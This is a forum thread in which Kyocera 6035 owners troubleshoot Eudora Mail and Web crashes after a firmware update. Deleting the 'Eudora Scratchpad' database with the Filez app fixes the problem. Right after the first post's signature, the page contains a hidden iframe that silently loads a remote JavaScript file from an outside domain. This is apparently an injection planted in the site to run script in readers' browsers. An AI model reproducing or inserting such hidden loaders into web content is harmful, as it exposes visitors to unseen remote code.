I am going craaaaaaaaazzzzzzeeeeeeeee!

O.k., here's the sitch...

My beloved 6035 has been f'd up for the past month and I am about to do something drastic.

Until a month ago, I had never done a single firmware update for the year and 3 months that I owned it. But I was at Verizon one day, asked if they had the latest firmware versions, they said yes, so I had them update it.

They updated the Palm part, the phone part and added 2-way SMS. "Great", I thought. Now the original bugs will finally be exterminated, etc.

Well, I got home, sync'ed my phone to get all my apps and data back in it and now anytime I try to use Eudora Mail or Eudora Web, it immediately locks up on me and I get an error.

I can use Blazer, SMS and all PQA's just fine, but anything with Eudora makes it crash.

I had been jonesin' for email, etc. for the past 4 weeks until I finally signed up for "Gopher King" and downloaded the PQA.
D@mn I love Gopher King!!!!!!!!!! But I would really like to be able to use Eudora Mail & Web again.

I probably shouldn't have updated the phone. It was virtually crashless for it's first 15 months until the update. But I do like the new SMS "Messages" app.

Has this happened to anybody else? Why the problem with Eudora? I have tried so many times to make this work, but no luck so far.

Please help me!!!!!!!!!!!

Thanks,
~Eudora-less 'kito<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

No way, I have resisted for this long, now I am waiting for Godot or the Kyo 7035. Whichever arrives first.

My phone "info" says that I have version 2.1.1

I can't quite remember. I think so, but not sure.

Eudora Mail: When I tap on any mail, it crashes and I get...
Fatal Alert: DataMgr.c, Line:7025, DmWrite: DmWriteCheck failed"

Same exact error when I simply tap on the "Eudora Web" icon.

Alex Matthews, you are a god!!!

I followed your advice: downloaded the free app. "Filez" at...

http://www.handango.com/PlatformProd...p;platformId=1

found "Eudora Scratchpad" on the list, deleted it and right then and there, my Eudora Mail &amp; Web crashing problems disappeared.

D@mn you have made me a happy guy again.

Thank you so much. Hopefully others in this situation will stumble across this thread and have the same happy outcome.

Thank you again,
~Markito

I ran into the problem when I first got the phone, and then after I updated the SX version. I put up the FAQ item, but someone else had provided the solution to me a while back. I'm glad it fixed your problem.

Yes!!!!!!!

Thanks Alex Matthews, you just solved my problem! I spent about two hours battling with Verizon to get this problem fixed to no avail. Two minutes on the forum and my phone's working again!

Thanks!

Ya gotta love google!

Now if I can just fix my headphone jack, I can make my 6035 last until Verizon releases the T600 or a BT phone....

Thanks again!

New/Old 6035 coming

I've got a 6035 coming tomorrow for the husband. He's currently got a crappy audiovox phone that just doesn't cut it.
after reading these posts, should I get it upgraded right away to whatever the newest firmware version? Or leave it at whatever version it's got when it gets here?

Thanks!

hi, ya update, i assume you didn't buy it new, so you'll have to get it programmed anyway if you use a different phone company than it's setup for. apparently the phone company that has this eudora issue includes an application update that doesn't agree with the ancient Palm os in your phone, great phone though, mine still works, but it's a paper weight atm, good back up though

Eudora fix?!? Please let it work!

Oh thank heavens! A probable solution to this headache!

After WAY too long of a google session, I found this thread!

I have only a vague notion of problems with Eudora Web before jumping to Xiino years ago and never looking back. And I never used Eudora mail - too much of a headache on the memory limited 6035! I've just used web email for on the go access.

Hmm. Now to find a version of FileZ that works with the 6035 - supposedly the latest version 6.8.3 is compatible (Palm OS 3.0 and up). I'm keeping my fingers crossed!

I can hardly wait to get home and try it!

Thank you to many folks:
- For those sharing info like this,
And
- To those keeping up a site to make it available in time of need (even YEARS latter!).
